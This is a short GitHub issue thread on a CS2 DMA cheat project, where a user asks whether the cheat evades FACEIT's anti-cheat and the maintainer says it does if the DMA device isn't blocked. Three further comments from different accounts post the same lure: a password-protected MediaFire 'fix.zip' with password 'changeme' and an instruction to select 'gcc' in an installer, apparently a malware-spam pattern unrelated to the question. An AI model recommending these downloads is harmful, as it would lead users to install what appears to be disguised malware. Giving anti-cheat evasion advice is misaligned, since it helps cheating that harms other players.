### ISSUE TITLE
FACEIT

### ISSUE THREAD

**Issue by Oifox** [Enoouo/Pro-CS2_DMA#7]
Does it works on faceit? Does Faceit Anti-Cheat detect this?

**Comment by Enoouo** [comment]
It depends on your DMA. If your DMA hasn't been blocked by Faceit, then Faceit won't be able to detect it.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
